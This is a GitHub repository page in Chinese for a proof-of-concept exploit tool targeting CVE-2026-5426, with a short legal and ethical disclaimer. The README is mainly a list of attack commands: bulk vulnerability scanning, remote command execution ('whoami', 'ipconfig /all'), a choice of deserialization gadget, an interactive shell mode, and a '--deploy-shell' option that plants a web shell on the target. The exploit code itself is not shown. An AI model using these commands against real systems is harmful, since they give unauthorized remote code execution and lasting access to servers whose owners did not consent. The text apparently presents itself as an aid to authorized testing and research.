HORKimhab/CVE-2026-5426

GitHub: HORKimhab/CVE-2026-5426

针对 CVE-2026-5426 漏洞的 PoC 利用工具,支持批量漏洞检测、远程命令执行及 web shell 部署,供授权渗透测试和安全研究使用。

Stars: 0 | Forks: 0

# CVE-2026-5426 ## ⚡ 简单用法 仅在安全和已授权的环境中使用本项目,例如: - 本地虚拟机 - Docker 容器 - 隔离的实验室环境 - 授权的渗透测试环境 示例设置: ``` git clone cd ``` 示例用法: ``` # 测试单个目标的漏洞 python cve-2026-5426.py -t https://example.com # 从文件扫描多个目标 python cve-2026-5426.py -t targets.txt # 在易受攻击的目标上执行命令 python cve-2026-5426.py -t https://example.com -c "whoami" # 执行复杂命令 python cve-2026-5426.py -t https://example.com -c "ipconfig /all" # 使用特定的 gadget 类型 python cve-2026-5426.py -t https://example.com -c "whoami" -g "WindowsIdentity" # 交互式 shell 模式 python cve-2026-5426.py -t https://example.com --interactive # 部署 BLUEBEAM web shell python cve-2026-5426.py -t https://example.com --deploy-shell ``` # 📚 教育安全研究仓库 一个用于在受控环境中学习、测试和研究网络安全概念的仓库。 ## ⚠️ 安全与法律免责声明 ## 目的 本仓库**仅用于教育和授权的安全研究**。 它旨在帮助用户学习了解: - 安全漏洞 - 沙箱与隔离概念 - 安全编码与防御实践 ## 仅限授权使用 仅在您已获得许可的环境中使用本仓库,例如: - 个人实验室或虚拟机 - Docker 或隔离环境 - 授权的渗透测试 - 网络安全培训或学术研究 严禁任何未经授权或非法的使用。 ## 免责声明 作者和贡献者对本项目造成的任何损害、滥用、法律问题或损失**不承担任何责任**。 使用本仓库即表示您同意: - 您需对自己的行为负责 - 您将合法且合乎道德地使用它 - 本项目按“原样”提供,**不提供任何担保** ## 道德使用 本项目旨在用于: - 防御性安全研究 - 网络安全教育 - 漏洞意识提升 - 安全系统与软件研究 请遵循负责任的漏洞披露原则,并遵守所有适用的法律法规。 ## 联系方式 如需进行负责任的漏洞披露或合作,请通过 GitHub 联系仓库维护者。
标签:CISA项目, Python, WebShell, 命令执行, 无后门, 请求拦截, 逆向工具